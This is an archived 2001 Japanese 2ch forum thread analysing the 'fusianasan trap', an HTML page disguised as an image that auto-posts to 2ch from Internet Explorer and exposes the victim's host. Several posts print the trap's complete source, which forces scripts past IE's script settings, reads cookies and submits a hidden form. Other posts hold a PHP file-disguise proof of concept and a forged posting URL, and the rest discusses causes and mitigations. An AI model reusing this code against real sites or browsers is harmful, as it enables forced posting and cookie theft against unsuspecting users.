2012年09月セキュリティ85: fusianasanトラップになんらかの対処を (905) TOP カテ一覧 スレ一覧 2ch元 削除依頼
SQLExp(SQLP,Slammer,1434番ポート)スレッド 1 (224)
セキュリティに関するニュースを淡々と伝えるスレ7 (300)
会社のネットワークでやってはいけない三箇条 (412)
アンチウィルスソフトのウィルス誤検出 (239)
【AA】avast!Anti-Virus Part131【きゅい!お断り】 (565)
★☆インターネットウイルスプロテクターV4☆★ (347)

fusianasanトラップになんらかの対処を


1 :01/12/17 〜 最終レス :2012/10/31
リンク先の画像を見ただけでスレにて勝手にfusianasanされてしまうというトラップが蔓延してるようです。
私が知る限りでは海外サッカー板などで猛威をふるってるようです。
なんらかの対処が必要ではないでしょうか。
以下がそのトラップのリンクです。
ttp://www2j.biglobe.ne.jp/~tatuta/cgi-bin/paint/15.gif
実験以外の目的ではくれぐれも踏まないようにお願いします。
もし踏んだ場合、ウィルスのように同じリンクがスレに増殖してしまうので、以降の利用者のためにこの注意文をコピペするなどして注意を喚起するようにしてください。

2 :
ブラクラにProxomitronで対抗するスレ
http://pc.2ch.net/test/read.cgi/software/998274524/

3 :
半角がすごいことになってるYO!

4 :
ニュー速で20個くらいこれが原因の同名スレが並んでる。

5 :
半角死んだな。

6 :
スマソ
厨房なんでよく分からんのだが
踏むと、自分の知らないうちにレスをするの?
スレを建てるの?

7 :
>>6
多分、観測にはここら辺が良いかと思う。
http://news.2ch.net/test/read.cgi/newsplus/1008578204/

8 :
これ DL したけど、0 としか入ってない
どういう仕掛けになっとんねん?

9 :
>>8
すでに消された模様

10 :
ソースのぞいたら、こんなのがでてきたんだが・・・
http://www.interq.or.jp/www1/marimo/gallery/cg/top06big.jpg

11 :
気の小さいやつは見ない方がいいぞ。

12 :
半角板ってどこにあるのか知りたいんですが。見つかんね。

13 :
と思ったらあった・・メガネかけて逝ってきます。

14 :
半角板は今『小学生の○んこ画像!』祭り。

15 :
半角板でイパーイ2ゲットできるYO。
2ゲット祭。

16 :
>>9
ここで手に入った
ttp://www2.makani.to/akutoku/upload/dat/1008583360.gif

17 :
これらしいが?
http://www.forest.impress.co.jp/article/2001/12/17/iesecuritypatch.html

18 :
半角板が嵐のようだw

19 :
<?php
Header("Content-type: application/ms-word");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
readme.doc という名前にして AddType application/x-httpd-php .doc として IE 6
(MS01-058 patch なし) で試すと、「次のファイルをダウンロードしています - readme.doc - ファイルを開くか、
ファイルをコンピュータに保存するか選択してください」というダイアログが出る。で、「開く」と答えると、 calc.exe がいきなり実行されてしまう。
これで IE 6 も IE 5.5 と同程度に危険ということに。 patch ありではちゃんと「calc.exe」になる。もっとも、Office がインストールされていない環境とか、
Office の open 時のデフォルトの挙動の設定とかにも依存するのだろう。 (きっと「デフォルト = open」が影響しているに違いない)

20 :
同名スレッドの建立を一定時間規制すりゃいいじゃないの。

21 :
>>19
すまん。違ったようだ。

22 :
これってどういうロジックになってんの?

23 :
現在氏亡のスレ
半角板 http://www2.bbspink.com/ascii/index.html
厨房板 http://tmp.2ch.net/kitchen/
今夜でどれだけお亡くなりになるんだろう・・・

24 :
キト、引っ張ってくる画像ファイルん中に答え書いてあるねん。
なんでjpgん中にスクリプトかいてあるのん(w

25 :
パチ板もお祭りだよ!

26 :
とりあえずソースから追っかけて、投稿スクリプト走らせてるサイト
潰しに掛かればいいぢゃん。
というか、其処からの投稿規制掛ければいいのか。
何箇所有るんだ??

27 :
アイドル板もお亡くなり
http://www2.bbspink.com/girls/index.html
誰か何とかしてくれYO

28 :
凡そ一時間位前、6カ所程。
外部アプロダに貼られていた模様。

29 :
いろんなバージョンが出回っているようだな

30 :
プロクソオミトロン使えよ

31 :
これ踏むと自分のPCになんか影響は出るわけ?

32 :
厨房すごかった。
全スレの8割くらいがこいつだった。

33 :
>>30
防御してもスレッドが建てられ、しなかったら節穴になるのであまり効果はないな。

34 :
オミトロンでも駄目なのか?

35 :
オミトロンでイメージチェッカーフィルター入れても駄目か?

36 :
デフォルトのままだとあまり効果的でない。
弄れ。

37 :
直リンは
右クリでデスクトプにでも一旦保存して.txtにしてソース見る。
色々フシアナさんで楽しいよ(w
ダメだよ。シビレフグなんて器具使っちゃ。。
イムポになちゃうよ。。

38 :
このトラップ
トロイの仕込まれているリンク先が関係あるのか?

39 :
もう逃げちまってる。。。.jpgにソース入れてあるよん。
本体.txtにすると、、、、
#前略
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';
f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Welcome to 裏2ちゃんねる!';
}
var ura2=false;
if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.net/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){
f1.MESSAGE.value='guest guest\nWelcome to 裏2ちゃんねる!\n'+parent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
#こやって書きコねん。
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
#一番下にこれ有ったけど。。。何?(w

40 :
       ∧_∧
  ぷ | (; ´Д` )ガーン
 \ぅ | /    \
   \ / /|    |ヽヽ
  __| | .|    | | |__
  \   ̄ ̄ ̄ ̄ ̄   \
  ||\            \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||

41 :
MS Java Script だけで2ch荒らすとは、お見事!
最近はやったW32.Badtransウイルスとかと同じようなバグを使っているのねん(TT
HTMLをContent-Type: image/gifと偽装すると、IEが食ってHTML内部のScript
を実行… Content-Typeや拡張子は関係なく、ファイルの中身で判断してバカIE
が開くみたいですね…

42 :
>>41
んで、ぢゃばの確認窓は回避と。。
ちびっとまづいね。。。
アイデア次第で応用利くし。。

43 :
これMSは対策しないとまずいのでは・・・。

44 :
Scriptだけで書き込みできてしまうって言うのはまずいでしょうね…
しかもHTML置いてあるのとは違うドメインにカキコですし。
同一ドメインのサブディレクトリー内にデーター送信の機能とかなら
まだ便利に使えるって言うのはあるかもしれないけど…

45 :
>>41
違います。Content-Typeは関係ない。
これをtext/htmlとして保存しても走る。

46 :
>>45
Content-Type: text/htmlをHTMLとして開くのは正常ですね。
問題なのはimage/とかをHTMLとして開く問題、text/plainでもHTMLとして開くらしいし
fusianasanトラップとかW32.BadtransとかはContent-Typeの無視が問題ですから、
W32.Badtransはシェルが拡張子で判断するのに、IEがContent-Typeだけ見て渡す問題、
fusianasanトラップをディスクトップ上に、*.gifで保存してIEで開いた場合はなぜか、
IEに拡張子の情報が送られそれで判断されてGIFとして開こうとする。
(IE5.5SP1、実際にfusianasanトラップの動くもので確認)
とりあえずその辺の判断の矛盾を突いているわけですね。

47 :
まぁ、画像板、アプロダ板も要注意って訳だ。
スクリプトチェク回避とは、、、TIME2恐るべし。
漏れはcontent-Tipeのアプリでの認識なんて信用してないから、
常にあやしいファイルはtxtにしてノートパッドで開いてソース見るし。
テキスト書くだけの機能しかないから安心(w
欲張り機能拡張アプリは危ない。。。

48 :
この場合の問題は、URI上のファイル名の拡張子で、人間が判断、
問題なかろうとリンクをクリックして起きる問題。
サーバーはファイルの拡張子でContent-Type: ヘッダーを付ける訳で
(拡張子が分からない場合はファイル内部を見るみたい、
 apachの設定ファイルを参照、mime.types, magic)
アプリケーションはそれに従うであろうと言う、ある程度インターネッ
トのプロトコルを知っている人間の方が陥りやすいのかも…
(真の素人は画像ファイルを開くのも危ないと判断するか分からないか)
W32.Badtransとかの場合はシェルに送るときの問題で、それだけしか
治していないのであれば、
IE内で処理される種類のContent-Typeの矛盾は治していないのかも…
今*.exeを.gifにして開くとtextとして開かれるました。
このタイプのセキュリティーホールはもうあったのでしょうか?

49 :
(^^;;

50 :
禿藁タ

51 :
IE6 Q313675 にしたけど、fusianasanトラップは直っていませんね、
ということで、fsianasanトラップは未発見!!!!!

52 :
まちがえた、「祝!2ch発セキュリティーホール」だよ

53 :
http://pc.2ch.net/test/bbs.cgi?MESSAGE=いたづらカキコ&bbs=sec&key=1008581128&time=1008751234
こんなのを他サーバにUPして拡張子偽ってるということでよろしいのでしょうか。

54 :
48
ワロタ

55 :
>>52
名前を赤にしたり、フォントサイズ変えたり、画像埋め込んだりって
やつは直ってたのか

56 :
>>48
マジ腹イタイッス・・・

57 :
>>44
その点で考えるとブラウザというよりは2chのCGIスクリプトの脆弱性なのでは?
ブラウザのレベルで他ドメインへのアクセスを禁止したら
自サイトにYahooの検索窓とか置けなくなるじゃん?
この問題、他ドメインからのfusianasan書き込みという2ちゃんねるの問題と、
偽造ヘッダによるIEの解釈の問題の2つに分けられると思うのですが。
2ちゃんねる的には偽造ヘッダ問題が完結しても、
拡張子htmlでfusianasan書き込みするようなスクリプトが書かれているページ
にリンク貼られたら同じだし、
2ちゃんねる以外でもfusianasan機能をもつコードをjpgとか偽って貼られたら
被害出るだろうし。
つーかこれみなさんの脳内で既出ですか?

58 :
>>57
>ブラウザのレベルで他ドメインへのアクセスを禁止したら
>自サイトにYahooの検索窓とか置けなくなるじゃん?
ん〜、ドメイン間のデータ受け渡しを切り離せれば問題ないわけですよ。
Yahooの検索窓であればそれと同居しているフレームとかの情報は必要
ないわけですから。同居ではなくてフレームを見えなくすることも可能
なわけで、そのままクラッカーサイトから他のサイトを見に行ってしま
うと、例えばIEのJavaScriptならHTMLのソースをすべてとれてしまう
隠しプロパティーあるし、Cookieやフォーム上の内容、そのページの
リンクもとページのURI、?以降のクエリーがあればそれも読める、
JavaScriptなどの変数とかの内容にもアクセスできるだろうし、
それで得た情報をPOSTしたりURIとして送信できたら問題でしょ?
これをフレーム間の脆弱性とか言うわけで。
基本的にドメインとパスの違う情報にアクセスできたらまずいわけで、
Cookieがよそのドメインやパスから読めたらまずいのと同じ訳。
設定をちゃんとしたらフレームが違うドメインをまたいでいる場合
警告ダイアログとか出せるようになります。
設定した上で1ch.tv見に逝くとよろしい、警告とか出るでアルよ(w
fusianasanトラップの場合はIE6で最新のパッチあてていても、
*.gifとかをHTMLとして実行してしまう、とりあえず画像のURLを
クリックして想像外のサイトに、飛ばされるのは充分セキュリティー
ホール、ファイルが置いてあるサーバー側で飛ばしているのではなく、
そのファイルを置いたものの意思でそう言うことができるのであれば。
それがHTMLファイルとしてのURLならクリックしたものの不注意として
考えられるが。(MSのHTMLにできない事ってないス(w)半分冗談だけど)

59 :
>設定した上で1ch.tv見に逝くとよろしい、警告とか出るでアルよ(w
http://www.1ch.tv/ から見に行って、左フレームのメニューを
クリックするとだった… 「ドメインの違うサブフレーム間の移動…」
と言う警告がだせる。

60 :
>つーかこれみなさんの脳内で既出ですか?
がいしゅつ!!!

61 :
>>58
よくわかりました。ありがとうございます。
57は今見るとよく理解しないまま知ったかぶった発言でした。
しばらくそれを踏まえてレス読み直してみます。

62 :
>>61
素晴らしいコント見させて頂きました
ありがとう

63 :
ちなみに、>>39
<xml:namespace prefix=t />
以下は
IEでスクリプトをオフにしていても、強制的にスクリプトを実行させるようにする記述です。
仕様らしいです

64 :
>>61
怪しいサイトを見に行ったあととか、セキュリティー的に漏れたら困る所を見に
行くときは、ウインドウを閉じてからにすると少しは安全。

65 :
>>63
どこの部分でPOSTとかGETの実行(切っ掛け)しているんでしょ?
ユーザーがボタンとか押した切っ掛けがないと投稿できないと思っていました。
(Script類だけでそこまでできたらどう考えてもヤバイよね…)
それとPOSTで投稿することまでできているんでしょうか?
あそこまでいろいろやっていると、余程詳しい人でないと全部は分かりません。

66 :
Netscape6.2.1は大丈夫みたいですね。
動かないみたいです。

67 :
>>65
ちゃんと読めばわかるよ。
きっかけはページの読み込み。
OnloadでJScriptが実行されて、
FORM内にあるSubmit ButtonがClickされる。

68 :
ドーデも良いが、IISにこれ置いた場合は再現できるんか??
>jpg(ぢつはhtmlとして開く)
apacheは簡単に手元で実験できるけど。IIS手元に無い。
>>63
TIME2という技術の仕様らしい。要望板でカキコ有った。
こっちの方が怖い。virに応用簡単。
実装早すぎたんでないの??
マイ糞.NET構想、勇み足な気が。。

69 :
良いよ。手元に有る奴ソース張っとく。活用しちクリ(w
書いた奴が悪い。。晒す。
#xx.xxx.txt
<!DOCTYPE>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
</HEAD>
<BODY>
<!--[if lt IE 5.5000]>
<noscript><IMG src="http‘探して辿ったら良かれポンチのグロ画像‘.png"></noscript>
<![endif]-->
<!--[if IE]>
<IMG src2="http.‘同上‘png" id=img1 style=display:none>
<span id=span1 style=display:none></span>
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
<form id=f1 method=POST style=display:none>
<input type=submit name=submit>
<input name=subject>
<input name=FROM>
<input name=mail>
<textarea name=MESSAGE></textarea>
<input name=bbs>
<input name=key>
<input name=time>
</form>
<script id=scr1 for=window event=onload>

70 :
var NAME='';
var TAR='';
function main1(){
NAME=parent.NAME;
var t1=TAR.split('/');
var dom=t1[0];
var bbs='';
var key='';
if(t1[1]=='test'){
bbs=t1[3];
key=t1[4];
}else{
bbs=t1[1];
key=searchKey(dom,bbs,3600);
}
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';
f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Welcome to 裏2ちゃんねる!';
}
var ura2=false;
if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.net/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){
f1.MESSAGE.value='guest guest\nWelcome to 裏2ちゃんねる!\n'+parent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));
parent.setTimeout("if1.location.replace('about:blank')",5000);
parent.img1.src=parent.img1.src2;
parent.img1.style.display='block';
f1.submit.click();
}

71 :
function main(){
var t1=location.search;
if(t1){
t1=t1.substr(1);
TAR=t1;
main1();
return;
}
t1=document.referrer;
if(!t1){
t1='http://tmp.2ch.net/kitchen/';
}
if(!t1){
img1.src=img1.src2;
img1.style.display='block';
return;
}
t1=t1.substr(7);
var t2=t1.indexOf('#');
if(t2>=0){t1=t1.substr(0,t2);}
var t3='';
var t2=t1.indexOf('/');
if(t2>=0){t3=t1.substr(0,t2);}
queryCookie(t3);
if1.location.replace(location.href+'?'+t1);
}
main();
function queryCookie(s){
var t1='about://'+s+'/\n';
t1+='<script id=scr1 for=window event=onload>';
t1+='try{parent.catchCookie(document.cookie)}catch(e){}';
t1+='<\/script><noscript><xml:namespace prefix=t /><?import namespace=t implementation=#default#time2 /><t:set id=set1 to=\'\' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML /></noscript>';
ic1.location.replace(t1);
}
function catchCookie(s){
NAME=recognizeCookie(s,'NAME');
}
function recognizeCookie(s,k){
var t=s.split('; ');
for(var i=0;i<t.length;i++){var r=t[i].split('=');if(r[0]==k){return unescape(r[1])}}
return '';
}

72 :
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
<![endif]-->
</BODY>
</HTML>

73 :
おっと>71-72に
コレ挿入
function searchKey(dom,bbs,len){
var t1=Math.floor(new Date().getTime()/1000);
var t2=t1-len;
var t3='http://'+dom+'/test/read.cgi/'+bbs+'/';
for(var i=t1;i>t2;i--){
var a1=document.createElement('A');
a1.href=t3+String(i)+'/l50';
span1.appendChild(a1);
if(a1.currentStyle.visited=='1'){
return String(i);
}
}
return '';
}

74 :
>>46
だからIEがMIMEタイプを無視する問題は
今回のfusianasanバグと直接は関係ないと言ってるんだが。
41じゃあたかもMIMEタイプバグを衝いて起動しないはずの
スクリプトを起動してるかのように読める。
そうじゃないと言ってるの。
問題の切り分けくらいちゃんとしようよ。

75 :
まだわかりにくいか。
「text/html として送られてきたなら本来起動しないはずの
スクリプトを起動させるバグを利用しているかのように読め
るが、強制的にスクリプトを起動させる手法は違うもの」
と言いたいの。

76 :
>>67
>ちゃんと読めばわかるよ。
>FORM内にあるSubmit ButtonがClickされる。
どもありがとう、ちゃんと読んでいませんでした(^^;
意外と原始的な方法でやっているのですね。
f1.submit.click();
submidボタンは押せないようにしてほしいですよね…
submidボタンを押していると言うことはちゃんとPOSTで送っているのだろうから、
クエリーさえその掲示板に合わせておけばいいから、どんな掲示板でも防御でき
ないですね、上手くやれば普及している掲示板を判定して掲示板づたいに増殖する
ウイルスなんて作れるのではないかな? 人間がURLをクリックすると言うことが
必要ではあるけど、上手くやればまず誰かがクリックする。

77 :
>>75
text/html として送られてきたなら本来起動しないはずのスクリプトを起動させるバグ
と言うのなら理解できるのですが、もしかして、*.htmlになっていてtext/htmlとして
送られてきたら、fusianasanトラップは動かないの?
>強制的にスクリプトを起動させる手法は違うものと言いたいの。
その辺詳しくプリーズ

78 :
さて、そろそろ一人歩きするかなコレ(w
画期的なのはむしろノーチェクでスクリプト
走らす点。
別にjpg/gif偽装したのは半角板で効果出すためとも思われ。
現に、、、だし(w
各種仕様書漁ってるヤシは大したもんだ。
ネタ尽きなくて面白いねIEは。
漏れ、敬意を表して暫くは穴塞がないどいたげる(w
つか、パッチ出るの??
別に良いや、こんなもん意識のもってき方で防げるし。
・・・個人的には。(htmlでやられるとチト痛いが)
勉強に成りました>>作者さん。

79 :
>>7G
つか、自分で調べろ。全部書いてあるぢょ。
こういうネタに教えてチャンはR。。。

80 :
このスレ保存版だな、とりあえず。
しかしすぐ広がりそうだな、時期も時期だし。まったく困ったもんだ。

81 :
>79
>63の<xml:namespace prefix=t />のあたりはTIMEをつかって、
「IEでスクリプトをオフにしていても、強制的にスクリプトを実行
させるようにする記述です。」
と言うことではないのか? ユーザーが設定でスクリプトを切っているときの

82 :
1.text/plainだろうがimage/gifだろうが動作する。(IEが勝手にファイルを解析してHTMLとして表示させようとするため)
  →これがMIMEタイプバグ
2.>強制的にスクリプトを起動させる手法
  スクリプトONであればJavaScript標準の機能を用いて動作する
  スクリプトOFFであれば81さんの言っている通り。

83 :
修正パッチを当てていても
アクティブ スクリプトはオフにしないといけないのでしょうか?
それとも、オフにしても危険なのでしょうか?
初心者な質問ですみません。教えて下さい。不安です。

84 :
>82-83
81の言うとおり。。
82が言う1のMIMEタイプは、ローカルだと再現できんでしょ。アパッチ噛まさなきゃ。
文字コードの認識でもそうだけど、Apacheが便宜上勝手にヘッダ吐くのも仕方ないし。
漏れは、IISでも再現できるのか知りたい。
>text/plainだろうがimage/gifだろうがソースがhtmlならIEはhtmlとして認識。
http://teri.2ch.net/test/read.cgi/accuse/1008597418/
要望板の同名スレ。こっちの799以降の方が詳しい。

85 :
>>83
アクティブスクリプトはOFFにしたほうがよいそうです。
(修正パッチはfusianasanトラップには対応していない)
不安でしたら「レベルのカスタマイズ」で全て安全な方向に設定しておくべきかと。
(但し見られないサイトが出てきますが…(w)

86 :
83です。
回答、どうもありがとうございました。
とりあえず、このままOFFにしておきます。

87 :
>>85-86
しないよりはしたほうがいい、かもしれないけど、ここには・・・・
(以下ネットセキュリティ速報ページと、検証してくださった方の書き込み)
www.netsecurity.ne.jp/article/1/3616.html
memo.st.ryukoku.ac.jp/archive/200112.month/2396.html

88 :
海外でネタにならないの祈るだけ。。。
比較的この手のネタ早耳のVIRサイトでも出てないみたいだから未だ
大丈夫とは思うけろ。。。なんとも言えないね。。。
漏れはビックリ年賀メルに平和的利用汁(w
つか、それ以上のもん組むスキルも無いけろ。。。

89 :
上記要望板より
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default Behaviors
レジストリのここを消せばHTML+TIMEが無効になり、
元に戻せばHTML+TIMEが有効に戻ります。
http://teri.2ch.net/test/read.cgi/accuse/1008597418/873

90 :
今こんなこと言っても仕方ないのだが、
根本的なところでは、
・何でも連携
・何でも勝手に処理
というMSの姿勢が問題なん?
この考え方、昔から気に入らないのだが。
おかげでどれくらいウィルス流行ったことか…
これを機にして、MSがIE/OEのアホな「仕様」を
見直してくれれば(・∀・)イイ!なぁと思ったり。
…無理な願いかな。

91 :
>>84 :79
>文字コードの認識でもそうだけど、Apacheが便宜上勝手にヘッダ吐くのも仕方ないし。
ってなに? Content-Type: 返すのはべつにapach独自の仕様というわけではないのだが…?
>漏れは、IISでも再現できるのか知りたい。
IISはContent-Type: を返さないと言うことなのか? そうでないのなら、
Content-Type: image/gifとかを返すように設定して実験したら分かるだろうが、
おれは持ってないので分からない。
Content-Type: がかえらないのなら、ファイル内容とか、URIのファイル名の拡張子で
判断するしかないが、内容で判断なら再現するし、拡張子で判断なら、ディスクトップに
置いて開くとの同じ。
さっきGET / HTTP/1.1 Host: www.microsoft.comしたら、
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Type: text/html
と返ってきたけど… 何が言いたいのかさっぱり分からない。

92 :
まとめてみました。
http://www2.sala.or.jp/~uuu/script/

93 :
>>90
>これを機にして、MSがIE/OEのアホな「仕様」を
>見直してくれれば(・∀・)イイ!なぁと思ったり。
>…無理な願いかな。
これを機にってあんた!今まで何回あったか… またContent-Typeがらみで
パッチ出すのって恥ずかしくないんかな、そう考えるとすごいyo
やはり無理でしょう… ユーザーのセキュリティーにコストを掛けるのは
負け組企業とでも考えているのでは。
Windowsとか使っている者はMSに対して負け組なんだろうけどね

94 :
httpプロトコル知らないと誤解するといけないので、こんどはinit_windows.gifで
拡張子.gifにしてIISに置いておけばいいのでは? magicみるの?
たとえ、text/htmlで返ってきても問題ないのでは? ユーザーは普通見ないし
GET /library/homepage/images/init_windows.gif HTTP/1.1
Host: www.microsoft.com
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
Connection: close
Date: Fri, 21 Dec 2001 10:03:29 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Tue, 10 Jul 2001 20:37:44 GMT
ETag: "05ce52b809c11:892"
Content-Length: 2828
GIF89a
上記行がGIFファイルの内容のmagic、上記行と合わせてこの辺がGIFのバイナリ
お絵描き掲示板とかアップローダーでどうにかするには、magicを調べると良いかもね

95 :
>>91/81
>Content-Type: 返すのはべつにapach独自の仕様というわけではないのだが…?
もう良いよ。。。ヘタレな漏れの素朴な疑問だ。コレだけ解れば良い。サンクス。
>GET / HTTP/1.1 Host: www.microsoft.comしたら、
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Type: text/html
仮に、マイ糞.comが頭に/index.jpg置いててもこうなるのか知りたかっただけ。
sageでコレだけ進むとは...その方が良いけろ(w
忘れた方がシアワセな場合も有るし。

96 :
>magicみるの?
この辺からそこはかとなく解ってきそう。。。サンクス。
>text/htmlで返ってきても問題ないのでは?
・・半角板ではまづいと思われ(w

97 :
これか?
http://www.google.com/search?q=cache:Bhn0pGw6cAo:www2.sala.or.jp/~uuu/dhtml/forcescript.html+xml+namespace+time2&hl=ja&lr=lang_ja
これも。
http://www.google.com/search?q=cache:VrblljcOrYM:www2.sala.or.jp/~uuu/dhtml/forcesound.html+xml+namespace+time2&hl=ja&lr=lang_ja
強制的にサウンド再生ってことは
MediaPlayerの脆弱性を同時に突ける気がする…。

98 :
>>93
やっぱり?
まぁ、毎回毎回改心してくれと思ってきたが、
そのまま今の状態まで来てるしなぁ…。
本当に、MSにはいい加減にして欲しいよ。
昔に比べればパッチは出るようになったがなぁ。
元のソフトがこんなショボいんでは
正直、使う気にならん。
小一時間(略)

99 :
さて、Netscape6.21をメインで使用するブラウザに設定、と

100 :

祭り板で再発一人歩きだ。。。
ttp://www.hellplant.org/cgi-bin/uploader/upload.cgi
該当アプロダカキコ。。確信犯。証拠保全。

[206.jpg]2chにすれ立てるやつ(悪用禁止)2001年12/18(火)13:48

101 :
なるほど・・・
判別方法は右クリックで「対象をファイルに保存」かな。
JPEGなのにファイルの種類にHTMLドキュメントって出る。

102 :
>>101
パッチ出てない以上他にやりようないべ。。。
レヂいぢる手も有るけど。
別にjpg/gifごとき、ブラウザで直接表示させる必要何処にも無い。
オフラインでビュワー使えば良いだろ。
MIMEがどうこう言ってる頭でっかちは勝手に引っかかれ。知らん。

103 :
view-sourceでヘッダ見りゃいいじゃん。
つーかネスケ派の俺には関係ないが

104 :
ブラウザ=IEと初心者に刷り込まんばかりの勢いのMSに対して、
誰か訴訟起こさないかな?
独占禁止法とは別に。
「危険なソフトをデフォルトにしておいて、
ウィルスその他で多大な被害をこうむった」って(藁
電子レンジに猫入れて乾かそうとして、
「猫入れるなって説明書に書いてないだろ、ゴルァ」
で裁判起こして通る国だぞ。アメリカは。
何より、よくわかってない初心者が一番かわいそうだよ。

105 :
>>104
OEモナー
消えろ。

106 :
>>104
どうぞ起こしてください。
応援はします(藁
消えてくれた方が嬉しい。
Nimdaも次から次とやってきてかなりウザかった。
おいらのネットワーク細いのに。

107 :
でもネスケがスタンダードになったりすると、
今度はネスケのセキュリティホール探すだろうから
結局あまり変わらない、というのは素人考え?

108 :
Windowsと直結してないだけ
寝透けの方がまだマシな気はするんだが。
正直、よくわからん。

109 :
別に、何使おうと意識の問題だと思うが。
絶対安全なんて幻想持ってる限り何使っても同じ。
常に穴意識させられるもん使ってたほうが漏れは安心。
ネスケは情報少ないから嫌。
つか、本音は、穴空く度にお祭り騒ぎしたいだけかも(w
・・・でも確かにワラワラ引っかかってるの見るのは痛い。

110 :
> 穴空く度にお祭り騒ぎしたいだけかも
俺もそうだ。やや欝。

111 :
俺はいま現在はネスケ6.2がメイン。
怪しいページ覗くときはLynxかw3m。

112 :
>>110
ケコーン汁。
モ、漏れ、タチ、、、ダケド

113 :
>>109
でもやっぱり、Outlook Expressだけは消えて欲しいYO!!!!!!!!!!!!
多分あんな"ウィルスばらまき機能"をつけたメーラーは
マイクロソフト以外にはつくれないと思う。
あまり関係ないのでさげ。

114 :
確かに、会社で何十台も端末抱えて管理してると事態は深刻だね。
漏れの意見はあくまで一個人ユーザーとしての意見。

115 :
これ見た?
https://www.netsecurity.ne.jp/article/1/3616.html

116 :
>>115
貼ってあるリンク辿って、ここまで戻ってきたぞ(藁

117 :
>>115
俺、それ辿ってここきた。
もともとここの住人ではないんだが、
貼ってあるリンクほURLが2ちゃんねるで、正直ビクーリした。

118 :
s/ほ//

119 :
>116
>この問題に関しては、12月13日に発表された累積パッチにより解消することが可能だ。
しかも、記述間違ってるし(W

120 :
> 貼ってあるリンクほURLが
自分で書いて藁てしまった。

121 :
ひろゆきがこのネタ使って、MS社から謝礼でももらうぐらいやって欲しいのう。
で、何に使うか?>謝礼

122 :
うまい棒だろ

123 :
許さん。
漏れのうまい棒しゃぶれ>ひろゆき

124 :
>>95
>仮に、マイ糞.comが頭に/index.jpg置いててもこうなるのか知りたかっただけ。
それはサーバー側の設定しだいですね、.jpgをindexとして使うかはapachでも
どうだっけ。
IISの場合はdefault.*だったのでは。
microsoft.com/だと下記のヘッダーも付いてます。
Content-Location: http://microsoft.com/default.htm
Telnet.exe でポート80 microsott.comにつないで、
GET /library/homepage/images/init_windows.gif HTTP/1.1
Host: www.microsoft.com
あと空行を入れて生のものは見れますので、SamSpadeとか使うと楽ですが。
上記のはGIFへのやつだけど。

125 :
>>121
「仕様です」とか言われて終りのような気もする。

126 :
しかし、スクリプトを無効に設定しても、TIME2の方までチェックしてい
ないのはMSらしいと言っていいのか
ガスの元栓閉めろよ(W

127 :
>>126
ガスの元栓は開けっ放しが便利です。
その他、ガス器具もスイッチ1つで
すぐに使えるようになっています。
でも、ユーザーがしっかり管理すれば安全です。
知らない間に勝手に点火することがありますが、
それは仕様です。
…って、こんな感じか?

128 :
今こんなこと言っても仕方ないのだが、
>根本的なところでは、
>・何でも連携
>・何でも勝手に処理
>というMSの姿勢が問題なん?
>この考え方、昔から気に入らないのだが。
正論だけどさ、
一般ユーザはいちいち自分で判断するの面倒 と思ってるから
勝手に処理してくれた方がよいと考えてるし、
マスコミもそういった方が初心者に親切と煽ってきたからね。
そいつらにも責任はあると思う。
DOSの時代から日経パソコンのソフト批評なんか
ユーザに何も考えさせずに環境設定してインストール
してくれるソフトがエラクて、ユーザが自分で調整するような
ものは初心者に不親切と非難していたからね。
(冷静に考えれば、アプリケーシンがOSの環境を知らないうち
にいjくりまわし、どうさわったが不明な方が迷惑だ)
”勝手に何でも処理”というのは、そういうのマスコミの
論調のなかからうまれてきた面もあると思う。
だから、無責任なソフト評をばらまいた日経メディアなどにも
罪はあると思う。

129 :
そうそう、日経の雑誌は糞だよなぁ。
平気で嘘書くし。
おまえら、本当にわかっているのか小一時間(略)

130 :
>>128 実際ヘルプデスクへの初心者からの質問て確認メッセージごときに
「こんなメッセージが出ちゃったんですけどどうしちゃったんでしょう!?」っていうのが多い。
経費削減のためにはいかに"無駄な"メッセージを表示しないようにしないかが課題になる。
ヘルプデスクがくだらない質問でパンクしないために。
・・・というのが常套手段なんだけど、確かにOSに直結した昨日改善(善?)のサイレントインストールは諸刃の剣だ。

131 :
